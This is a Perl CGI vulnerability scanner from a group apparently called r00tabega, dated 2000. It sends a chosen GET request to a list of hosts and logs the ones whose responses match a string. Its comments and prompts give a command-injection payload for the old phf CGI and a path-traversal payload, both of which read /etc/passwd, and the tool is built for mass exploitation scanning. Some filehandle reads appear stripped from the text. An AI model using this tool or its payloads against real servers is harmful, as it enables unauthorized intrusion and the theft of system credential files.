#!/usr/bin/perl # futant - r00tabega 2000 # This is a little tool that will scan a list of hostnames # for a certain CGI or any web file for that matter and try # to match a user-given string to the text returned by the # webserver after the GET operation. # # For example, say you are searching for the old .phf hole, # you would put /cgi-bin/phf?Qalias=%0A/bin/cat%20/etc/passwd # in for the CGI path and root: in for the CGI string. # # Some of this code was ripped from Xphere whoever that is. use Socket; $SIG{'ALRM'} = sub { exit(0) }; $SIG{'CHLD'} = sub { wait }; print "\n\e[0;34m[CGI Scanner by futant]\e[0m\n\n"; print "\e[0;33mHost list filename:\e[0m "; chomp($in = ); print "\n\e[0;32mLog filename:\e[0m "; chomp($out = ); print "\n\e[0;35mCGI path (/cgi-bin/blah.cgi?blah=../etc/passwd):\e[0m "; chomp($cgipath = ); print "\n\e[0;31mString to match (root:):\e[0m "; chomp($cgistring = ); print "\n\n"; open(IN, "$in") || die "Can't open $in!"; open(OUT, ">>$out") || die "Can't create $out!"; while () { chomp($line = $_); if ($line =~ /(\S*)/) { if ($pid = fork) { sleep 10; } elsif (defined($pid)) { alarm(25); checkh($1); alarm(0); exit(0); } } } sub checkh { my ($server) = @_; my ($port) = 80; chop($hostname = 'hostname'); print "trying $server..."; ($name, $aliases, $proto) = getprotobyname('tcp'); ($name, $aliases, $port) = getservbyname($port,'tcp') unless $port =~ /^\d+$/; ($name, $aliases, $type, $len, $thisaddr) = gethostbyname($hostname); ($name, $aliases, $type, $len, $thataddr) = gethostbyname($server); socket(S, AF_INET, SOCK_STREAM, $proto); $sockaddr = 'S n a4 x8'; $this = pack($sockaddr, AF_INET, 0, $thisaddr); $that = pack($sockaddr, AF_INET, $port, $thataddr); if (bind(S, $this) && connect(S, $that)) { select(S); $|=1; print S "GET $cgipath HTTP\/1.0\r\n\r\n"; while () { chomp($serv = $_); if ($serv =~ $cgistring) { print OUT "$server has $cgipath.\n"; print " Yes!\n"; } else {print " No.\n";} } } close(S); } sleep 15; close(IN); close(OUT);